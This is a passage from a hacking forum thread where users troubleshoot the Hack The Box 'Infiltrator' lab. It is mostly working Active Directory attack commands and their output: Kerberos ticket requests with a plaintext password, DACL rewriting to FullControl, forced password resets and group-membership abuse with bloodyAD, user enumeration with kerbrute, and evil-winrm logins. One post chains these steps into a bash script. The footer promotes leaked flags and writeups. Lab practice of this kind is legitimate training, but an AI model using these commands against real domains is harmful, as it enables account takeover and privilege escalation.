Infiltrator HTB
by dogedofedoge - Saturday August 31, 2024 at 07:45 PM
#41
I have the e.rodriguez ticket, but I am getting the weirdest error trying to use it over winrm:
evil-winrm -i dc01.infiltrator.htb -u 'e.rodriguez@INFILTRATOR.HTB' -r infiltrator.htb

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winr...completion

Warning: User is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

Error: An error of type GSSAPI::GssApiError happened, message is gss_init_sec_context did not return GSS_S_COMPLETE: Invalid token was supplied
Success


Error: Exiting with code 1
/usr/lib/ruby/vendor_ruby/logging.rb:513: [BUG] Segmentation fault at 0x000000055ae4a7b0
ruby 3.1.2p20 (2022-04-12 revision 4491bb740a) [x86_64-linux-gnu]

-- Control frame information -----------------------------------------------
c:0004 p:0055 s:0019 e:000016 METHOD /usr/lib/ruby/vendor_ruby/logging.rb:513
c:0003 p:0011 s:0011 e:000010 METHOD /usr/lib/ruby/vendor_ruby/logging.rb:527 [FINISH]
c:0002 p:---- s:0006 e:000005 CFUNC :call
c:0001 p:0000 s:0003 E:0025e0 (none) [FINISH]

-- Ruby level backtrace information ----------------------------------------
/usr/bin/evil-winrm:0:in `call'
/usr/lib/ruby/vendor_ruby/logging.rb:527:in `shutdown'
/usr/lib/ruby/vendor_ruby/logging.rb:513:in `log_internal'

-- Machine register context ------------------------------------------------
RIP: 0x00007fbaf0fd14cc RBP: 0x00007fbaf110fac0 RSP: 0x00007ffefe37cbb0
RAX: 0x0000000000000002 RBX: 0x0000000000000000 RCX: 0x000055ae4a36cb90
RDX: 0x000000055ae4a7a0 RDI: 0x000055ae49494010 RSI: 0x00007fbaf110fad0
R8: 0x000000055ae4a7a0 R9: 0x00007fbaf110fac0 R10: 0x000000055ae4a7b0
R11: 0x0000000000000010 R12: 0x0000000000000010 R13: 0x0000000000000002
R14: 0xffffffffffffffb0 R15: 0x0000000000000c01 EFL: 0x0000000000010246

-- C level backtrace information -------------------------------------------

Has anyone gotten winrm working?
Reply
#42
(09-01-2024, 03:34 AM)osamy7593 Wrote:
(09-01-2024, 02:52 AM)mxntysec Wrote:
(09-01-2024, 02:44 AM)ir0nman4l1f3 Wrote: What am I missing here?

└─$ impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!'

└─$ export KRB5CCNAME=d.anderson.ccache

└─$ python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip $ip Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra [*]NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*]DACL backed up to dacledit-20240901-023706.bak [*]DACL modified successfully!

└─$ python3 bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip $ip -u "d.anderson" -p 'WAT?watismypass!' set password "e.rodriguez" 'WAT?watismypass!' [+] Password changed successfully!

└─$ net rpc group addmem 'CHIEFS MARKETING' 'e.rodriguez' -U 'e.rodriguez' -S 'dc01.infiltrator.htb'Password for [WORKGROUP\e.rodriguez]: Could not add e.rodriguez to CHIEFS MARKETING: NT_STATUS_ACCESS_DENIED

root@kali:~# python3 bloodyAD.py --host dc01.infiltrator.htb --dc-ip 10.10.11.31 -u e.rodriguez -k -d infiltrator.htb add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez

[+] e.rodriguez added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB

after changing m.harris pass the acc is aslo have restrictions how u connent to evil-winrm

get TGT
evil-winrm -i dc01.infiltrator.htb -u "m.harris" -r INFILTRATOR.HTB
Reply
#43
where can i find the d.anderson password ??
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#44
(09-01-2024, 05:53 AM)fuliye Wrote: where can i find the d.anderson password ??

kerbrute --dc dc01.infiltrator.htb userenum -d infiltrator.htb users
Reply
#45
(09-01-2024, 05:39 AM)olkn00b Wrote:
(09-01-2024, 03:34 AM)osamy7593 Wrote:
(09-01-2024, 02:52 AM)mxntysec Wrote:
(09-01-2024, 02:44 AM)ir0nman4l1f3 Wrote: What am I missing here?

└─$ impacket-getTGT infiltrator.htb/d.anderson:'WAT?watismypass!'

└─$ export KRB5CCNAME=d.anderson.ccache

└─$ python dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip $ip Impacket v0.12.0.dev1+20240830.154152.9aa0954b - Copyright 2023 Fortra [*]NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*]DACL backed up to dacledit-20240901-023706.bak [*]DACL modified successfully!

└─$ python3 bloodyAD.py --host "dc01.infiltrator.htb" -d "infiltrator.htb" --kerberos --dc-ip $ip -u "d.anderson" -p 'WAT?watismypass!' set password "e.rodriguez" 'WAT?watismypass!' [+] Password changed successfully!

└─$ net rpc group addmem 'CHIEFS MARKETING' 'e.rodriguez' -U 'e.rodriguez' -S 'dc01.infiltrator.htb'Password for [WORKGROUP\e.rodriguez]: Could not add e.rodriguez to CHIEFS MARKETING: NT_STATUS_ACCESS_DENIED

root@kali:~# python3 bloodyAD.py --host dc01.infiltrator.htb --dc-ip 10.10.11.31 -u e.rodriguez -k -d infiltrator.htb add groupMember "CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB" e.rodriguez

[+] e.rodriguez added to CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB

after changing m.harris pass the acc is aslo have restrictions how u connent to evil-winrm

get TGT
evil-winrm -i dc01.infiltrator.htb -u "m.harris" -r INFILTRATOR.HTB

Man I don't know how you're managing to change the password before the minimum password age policy kicks in
Reply
#46
(09-01-2024, 06:05 AM)olkn00b Wrote:
(09-01-2024, 05:53 AM)fuliye Wrote: where can i find the d.anderson password ??

kerbrute --dc dc01.infiltrator.htb userenum -d infiltrator.htb users

is not work bro
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply
#47
how did you pass password age poilcy error , I restarted many times but still getting same error

Password can't be changed before -2 days, 23:59:45.483637 because of the minimum password age policy.
Reply
#48
(09-01-2024, 06:12 AM)fuliye Wrote:
(09-01-2024, 06:05 AM)olkn00b Wrote:
(09-01-2024, 05:53 AM)fuliye Wrote: where can i find the d.anderson password ??

kerbrute --dc dc01.infiltrator.htb userenum -d infiltrator.htb users

is not work bro

it is working but u need to create /etc/krb5.conf
for example with:

[libdefaults]
    default_realm = INFILTRATOR.HTB

[realms]
    INFILTRATOR.HTB = {
        kdc = dc01.infiltrator.htb
        admin_server = dc01.infiltrator.htb
    }

[domain_realm]
    .infiltrator.htb = INFILTRATOR.HTB
    infiltrator.htb = INFILTRATOR.HTB
Reply
#49
Hello everyone,
I’m having some trouble with a script I created to automate a task. It’s not working as expected, and I’m a bit stuck. Could anyone help me figure out what I might be doing wrong?
Thank you very much!

#!/bin/bash domain="infiltrator.htb" username="d.anderson" password="WAT?watismypass!" target_user="e.rodriguez" new_password="WAT?watismypass!" ip="10.10.11.31" cn_group="CHIEFS MARKETING" ou="MARKETING DIGITAL" print_error() {     echo -e "\e[31m[ERROR]\e[0m $1" } print_success() {     echo -e "\e[32m[SUCCESS]\e[0m $1" } impacket-getTGT ${domain}/${username}:'${password}' if [ $? -ne 0 ]; then     print_error "Failed to get TGT for ${username}. Please check your credentials and Kerberos settings."     exit 1 fi export KRB5CCNAME=${username}.ccache dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal "${username}" -target-dn "OU=${ou},DC=$(echo $domain | awk -F. '{print toupper($1)}'),DC=$(echo $domain | awk -F. '{print toupper($2)}')" "${domain}/${username}" -k -no-pass -dc-ip $ip if [ $? -ne 0 ]; then     print_error "Failed to modify DACL for ${ou}. Check if the user has the necessary permissions."     exit 1 fi print_success "DACL modified successfully for ${ou}." bloodyAD.py --host "dc01.${domain}" -d "${domain}" --kerberos --dc-ip ${ip} -u "${username}" -p "${password}" set password "${target_user}" "${new_password}" if [ $? -ne 0 ]; then     print_error "Failed to change password for ${target_user}. Ensure the user has the necessary permissions."     exit 1 fi print_success "Password changed successfully for ${target_user}." sudo net rpc group addmem "${cn_group}" "${target_user}" -U "${target_user}%${new_password}" -S "dc01.${domain}" if [ $? -ne 0 ]; then     print_error "Failed to add ${target_user} to ${cn_group}, trying with bloodyAD.py."     bloodyAD.py --host "dc01.${domain}" --dc-ip ${ip} -u ${target_user} -k -d ${domain} add groupMember "CN=${cn_group},CN=USERS,DC=$(echo $domain | awk -F. '{print toupper($1)}'),DC=$(echo $domain | awk -F. '{print toupper($2)}')" ${target_user}     if [ $? -ne 0 ]; then         print_error "Failed to add ${target_user} to ${cn_group} with bloodyAD.py. The user might lack necessary permissions."         exit 1     else         print_success "${target_user} added to ${cn_group} successfully with bloodyAD.py."     fi else     print_success "${target_user} added to ${cn_group} successfully!" fi evil-winrm -i "dc01.${domain}" -u "m.harris" -r "$(echo ${domain} | tr '[:lower:]' '[:upper:]')" -k if [ $? -ne 0 ]; then     print_error "Failed to connect to evil-winrm. Check the connection details and Kerberos settings."     exit 1 fi

Result exec:  Sad

./ad.sh Impacket v0.12.0.dev1+20240801.104651.6d8dd85 - Copyright 2023 Fortra Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid) Impacket v0.12.0.dev1+20240801.104651.6d8dd85 - Copyright 2023 Fortra [*]NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*]DACL backed up to dacledit-20240901-022244.bak [*]DACL modified successfully! [SUCCESS] DACL modified successfully for MARKETING DIGITAL. [+] Password changed successfully! [SUCCESS] Password changed successfully for e.rodriguez. Could not add e.rodriguez to CHIEFS MARKETING: NT_STATUS_ACCESS_DENIED [ERROR] Failed to add e.rodriguez to CHIEFS MARKETING, trying with bloodyAD.py. Traceback (most recent call last):   File "/home/gris/tools/LazyOwn/external/.exploit/bloodyAD/bloodyAD.py", line 5, in <module>     main.main()   File "/home/gris/tools/LazyOwn/external/.exploit/bloodyAD/bloodyAD/main.py", line 144, in main     output = args.func(conn, **params)             ^^^^^^^^^^^^^^^^^^^^^^^^^   File "/home/gris/tools/LazyOwn/external/.exploit/bloodyAD/bloodyAD/cli_modules/add.py", line 244, in groupMember     conn.ldap.bloodymodify(group, {"member": [(Change.ADD.value, member_transformed)]})   File "/home/gris/tools/LazyOwn/external/.exploit/bloodyAD/bloodyAD/network/ldap.py", line 216, in bloodymodify     raise err msldap.commons.exceptions.LDAPModifyException: LDAP Modify operation failed on DN CN=CHIEFS MARKETING,CN=USERS,DC=INFILTRATOR,DC=HTB! Result code: "insufficientAccessRights" Reason: "b'00002098: SecErr: DSID-031514A0, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00'" [ERROR] Failed to add e.rodriguez to CHIEFS MARKETING with bloodyAD.py. The user might lack necessary permissions.
Reply
#50
(09-01-2024, 06:19 AM)x1rx Wrote: how did you pass password age poilcy error , I restarted many times but still getting same error

Password can't be changed before -2 days, 23:59:45.483637 because of the minimum password age policy.

I've tried resetting and speedrunning the harris password reset like 10 times. There's gotta be another way.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 24 6,018 Yesterday, 04:10 AM
Last Post: cookky1
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 93,266 03-28-2026, 09:28 AM
Last Post: catsweet
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 87 11,268 03-27-2026, 07:22 PM
Last Post: stn
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 3,932 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 4,206 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: 1 Guest(s)